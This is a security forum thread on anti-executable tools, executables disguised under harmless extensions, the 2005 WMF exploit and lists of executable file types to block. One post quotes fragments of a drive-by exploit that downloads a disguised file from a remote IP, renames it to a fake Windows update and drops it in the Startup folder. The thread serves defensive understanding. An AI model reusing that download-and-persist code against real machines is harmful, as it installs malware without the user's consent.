Anti-Executables - List of

I've not looked at the .css file in question, but I would still bet that it's not a real .css file at all. It's most likely just a normal PE executable file that has simply been renamed to something harmless looking like "colorset.css". That is done all the time, to fool users, malware scanners and all sorts of things to think the file is innocent instead of being a normal executable that could be anything from nice game to nasty rootkit. The file extension doesn't matter at all: if code that is already running (like cmd.exe in this case, or exploit shellcode in some other case) wants to execute a file with a .css extension as a program, it can do that (cmd.exe calls CreateProcess on the file, and if it looks like a program, it is executed even if the file extension is .txt or .css or anything). Simply open the supposed .css file in a hex editor and check the headers - if there's an executable header, then it's a program, not a cascading style sheet at all.

Once executed, the program can then do what it wants, like create autorun.infs or other files that have innocent extensions but are really programs.

In this case, I wouldn't be quick to assume there's any exploit at all, as in, a vulnerability that is being exploited. I don't think anything suggests there's a buffer overflow or anything involved. The .css and .pif files are both likely just normal executables with a funny name to make them look innocent. If they can do something HIPS shouldn't allow, then there's probably some bypass of the HIPS products that has been discovered and is taken advantage of by the malware. The things HIPS attempts to do are extremely complex, and it would be a great wonder of the world if they were able to do a flawless job at it.

 

Remember, that a malcrafted file can do nothing without the proper program to execute the code. Clicking on the file, or running it by remote code execution from a web exploit calls the program associated with the particular file, and the exploit code runs.

The day that the wmf exploit surfaced back in 2005, I went to the site and the exploit did not work. Later that day as information trickled in, we learned that the program associated by default with .wmf is the Windows Picture Viewer. I checked my computer and I didn't have that program. It didn't come until WinXP and I had Win2K. The filetype .wmf wasn't even registered on Win2K.

So, I configured my XP Laptop to test, went to the site again, nothing. For some reason, the exploit would not trigger in Opera. But using IE6 brought results.

So, we forget sometimes that often, many things have to come together in order to get infected. This is true of PDF and Flash exploits, where a specific version of a program is necessary for the exploit to trigger.

Later, as the WMF PoC examples that StevieO referred to were released, we found out that other image programs that used a particular DLL were also vulnerable. If they didn't, you would get an error when attempting to open the file:

​

A .css file is a plain text file that requires some type of text editor. Here, I open one in Notepad:

​

In the frontiers.css file I referenced above, since it is really an executable, we see the binary code when opened in Notepad, but the code cannot execute because Notepad is a plain text editor:

​

That is why the only way aigle can get the .css file to execute its code is from the Command Line, for reasons Winchild has explained above, and it can be any file extension, as he said.

To use this file in an exploit would require some way of getting cmd.exe to run the file. This is true of any spoofed executable: some means by remote code execution is necessary to get the file to work. Here is an early such exploit, using an executable spoofed as a .gif file:

The web-based code first downloads the .gif file:

Code:

obj_msxml2.open("GET","http://85.255.1xx/[B]cnte-oiduuyes.gif[/B]

Then, the code renames the file as an .exe, and copies the file to a start up folder:

Code:

dstart=obj_WScript.[B]SpecialFolders("Startup[/B]");

var fn = daustart+"\\[B]Update_0802_KB110327.exe[/B]";

obj_adodb.[B]SaveToFile[/B](fn,2);

then the file is executed each time the computer reboots.


----
rich

 

In a web embedded attack, the files go to the browser cache or designated download directory. The WMF exploit triggered through IE6 downloaded to the Temporary Internet Files directory:

​

----
rich

 

Thanks to windchild for the input. As I have already said, this malware simply masqueraded as an innocous file. I remember Prevxhelp said that with such a file to do its dirty job, the system itself should already be compromised in the first place. Rmus had said that the initial exploit and the succeeding exploit would always took advantage of a remote execution vulnerability(or buffer overflow vulnerability) or active content or scripting(activeX, javascripts, vbscritpt via cross-site scripting or injected codes or redirections to a malware site) or plugins on the webbrowser.

Pardon me, Rmus, for the annoyance and some inconvenience on my part. Hats off as always for the nice, clear presentations! Thanks to both of you for the clarifications and putting this on a proper perspective. The mods could transfer these OT's to it's proper thread. Anyways, this is somewhat related, which provides some kind of a backgrounder if default-deny policies like the use of AE could mitigate such malware attacks.

 

Just thought I'd pop in and say hi. while it is a good secure policy of denying any thing unknown from running in the first place it is also important to make sure your Anti-Executable HIPS intercepts all types of Executables.

Adding another security layer on top of the already near 100 percent protection policy of denying all unknown executables from running. Is with MD you can also deny the "CREATION" of all executable files. If no such file exists in the first place how they execute and run?? its A good safe guard in case for any reason should you Anti-Executable program ever get disabled.

 

Normally, I don't download and run malware, but in that case, knowing what the code in the WMF file did, I tried a few at that time. All that happened was that Windows Explorer crashed. I never got one of the files to execute from the hard drive.

As for your other questions about malware: I don't know. You will have to ask a malware researcher.

----
rich

 

That's indeed the case with b.css. It has some interesting properties once you change its extension...

 

About the test wmf exploits c/o stevieo, you've got to test it with a clean install from an old windows xp cd.
In a patched system, those exploits will not work except some instance where the windows explorer will crash. Those test exploits will call out either "notepad" or "calculator". Interesting observation was just hovering the mouse on one .tif file without even clicking will call out the application utility, "calculator".

 

I could get the test.wmf files to launch the Calculator. I just couldn't get any of the real malware.wmf files to execute on disk -- only by remote code execution from the web site via the Windows Picture Viewer.

----
rich

 

I think this is the list that Microsoft includes specifically under SRP extensions (with LNK removed for SRP implementation):

ADE: Microsoft Access Project Extension
ADP: Microsoft Access Project
BAS: Visual Basic Class Module
BAT: Batch File
CHM: Compiled HTML Help File
CMD: Windows NT Command Script
COM: DOS Command File
CPL: Control Panel Extension
CRT: Security Certificate
EXE: Windows Executable File
HLP: Windows Help File
HTA: HTML Application
INF: Setup Information File
INS: Internet Communication Settings
ISP: Internet Communication Settings
LNK: Shortcut
MDB: Microsoft Access Application
MDE: Microsoft Access MDE Database
MSC: Microsoft Common Console Document
MSI: Windows Installer Package
MSP: Windows Installer Patch
OCX: ActiveX Objects
PCD: Photo CD Image
PIF: Shortcut to MS-DOS Program
PIF: Program Information File
REG - Registration Entries
SCR: Screen Saver
SCRIPT: Generic Script File
SHS: Shell Scrap Object File (hidden)
URL: Internet Shortcut (Uniform Resource Locator)
VB : VBScript File
WSC: Windows Script Component

There are many more that others include indirectly as executables, for example, macros in XLS docs etc.. A couple of other links..

http://pcsupport.about.com/od/tipstricks/a/execfileext.htm

http://antivirus.about.com/od/securitytips/a/fileextview.htm

I think there are threads on here somewhere (on SRP etc), which I couldn't immediately find, from a year or so back with more info as well..

 

Hi.. Is that because you running in admin mode..??

Running in LUA mode, I simply install any program or run any update separately "as an admin" - I don't need to switch SRP on and off at all...

 

If it's binary and about to be executed, SRP blocks them all no matter the extension. It doesn't work with extensions for binary executable files and vb scripts.

For non-Microsoft interpreters, it most likely depends on the extensions list, and relies on the execution starting from explorer or IE.

http://technet.microsoft.com/en-us/library/cc786941(WS.10).aspx

Wilders discussion: Software Restriction Policy vs Antiexecutable

 

Thanks for that post.
I think Faronics AE also blocks new exe's if ran from the command prompt.

 

Thanx for all the responses so far, some very nice info there.

Well i've been n gone n done it, yep installed WinSonar !!! After a couple of years without it trying various other Apps, it feels like i'm back home again, so to speak. And yes, it feels good too.

The last time was on 98SE and i loved it, very light and very little noise. It just does what it says it will on the tin. So it'll interesting to see how things go now i'm on XP.